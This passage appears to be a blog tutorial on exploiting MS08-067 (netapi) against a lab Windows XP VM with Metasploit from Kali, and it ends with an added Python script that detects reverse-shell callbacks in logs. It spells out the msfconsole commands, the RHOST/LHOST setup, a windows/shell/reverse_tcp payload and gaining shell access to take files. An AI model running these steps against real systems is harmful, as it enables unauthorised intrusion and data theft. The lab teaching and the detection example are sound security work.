Then, choose Host-only as your network connection.
After you click OK, go to your Windows XP VM and open VM > Settings again, but this time choose Custom and point it at your host-only virtual network.
Then, I want to set a new IP address in my Kali Linux that will be used later as my local host, or LHOST. Type sudo ifconfig eth0:0 <your desired IP address> netmask <your desired netmask> in your terminal (eth0:0 is an alias of the interface; use whatever name your interface card has). To test whether the connection between both networks is already established, ping the other computer. If it replies with 0% packet loss, the connection has been set up successfully.
If you do not know your Windows XP’s IP address, check it by typing ipconfig in your command prompt.
Now that the connection between the two host-only networks is established, we can start preparing for the exploitation step.
First things first, start the Metasploit application by typing msfconsole in your terminal.
Metasploit offers more than 1500 exploit modules that we can use against different targets. To see which exploits are available, type show exploits and the list of exploits with their descriptions will appear. Metasploit also keeps adding more modules from time to time, so make sure you update the application regularly.
In this post, I am going to use the Microsoft Server Service Relative Path Stack Corruption vulnerability in Windows XP, better known as netapi, as my entry point. Type use windows/smb/ms08_067_netapi.
The next thing to do is to set up the LHOST (Local Host) and RHOST (Remote Host). In this case, Kali Linux is the local host and Windows XP is the remote host.
To set RHOST and LHOST, type set RHOST <IP address> and set LHOST <IP address>.
Now the only thing left to do is to start the exploitation by typing the exploit command.
You might be wondering what we can do at this step. You can find out with the help command, which lists the commands that we can execute.
To check that this is the right target, I executed the screenshot command. The screenshot command captures the target's screen at that exact moment.
There are still many things we can do other than take a screenshot of the target's screen. But during a penetration test, our goal is to get shell access so that we have full control of the computer.
With this netapi vulnerability, we can execute the shell command to get shell access.
Alternatively, you can set the payload before you exploit the target by typing set PAYLOAD windows/shell/reverse_tcp; Metasploit confirms it with PAYLOAD => windows/shell/reverse_tcp.
Now that we have shell access, we can do just about anything with the computer, for example retrieve important files from the target's machine.
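From the defender's side, the reverse_tcp payload used above leaves a recognisable trace: the target is first contacted on its SMB port, and shortly afterwards the same target opens a new outbound connection back to the very host that contacted it. The following Python script, an added example and not part of the original post or of Metasploit, flags that pairing in constructed firewall-style log lines; the SMB port (445) and the sample addresses and ports are assumptions chosen for the illustration.

```python
# Added example (not from the original post): pair an inbound SMB connection with a
# fresh outbound connection from the same host back to the same peer shortly after.
# That is the on-the-wire shape of an SMB exploit followed by a reverse_tcp payload.
from collections import defaultdict
from dataclasses import dataclass

# Constructed firewall-style log lines: "<epoch> <src_ip>:<src_port> -> <dst_ip>:<dst_port>".
# 192.168.56.101 plays the attacker box, 192.168.56.102 the Windows XP target.
SAMPLE_LOG = """\
1700000000 192.168.56.101:49322 -> 192.168.56.102:445
1700000003 192.168.56.102:1041 -> 192.168.56.101:4444
1700000010 192.168.56.50:52000 -> 192.168.56.102:445
1700000900 192.168.56.102:1045 -> 192.168.56.50:80
"""

@dataclass(frozen=True)
class Flow:
    ts: int
    src: str
    sport: int
    dst: str
    dport: int

def parse_flow(line):
    """Parse one constructed log line into a Flow."""
    ts, src, _, dst = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return Flow(int(ts), sip, int(sport), dip, int(dport))

def find_reverse_shell_candidates(log_text, window=60, smb_port=445):
    """Return (attacker, victim, delay_seconds) for every outbound connection a host
    makes back to a peer that reached its SMB port within `window` seconds before."""
    flows = [parse_flow(l) for l in log_text.splitlines() if l.strip()]
    inbound_smb = defaultdict(list)  # victim -> [(peer, time of inbound SMB contact)]
    hits = []
    for f in sorted(flows, key=lambda x: x.ts):
        if f.dport == smb_port:
            inbound_smb[f.dst].append((f.src, f.ts))
            continue
        for attacker, t0 in inbound_smb[f.src]:
            # Same peer, and the call-back happens soon after the SMB contact.
            if f.dst == attacker and 0 <= f.ts - t0 <= window:
                hits.append((attacker, f.src, f.ts - t0))
    return hits

if __name__ == "__main__":
    for attacker, victim, delay in find_reverse_shell_candidates(SAMPLE_LOG):
        print(f"possible reverse shell: {victim} -> {attacker}, {delay}s after SMB contact")
```

The fourth sample line (a normal web request to a host that scanned port 445 fifteen minutes earlier) is deliberately outside the window and is not reported.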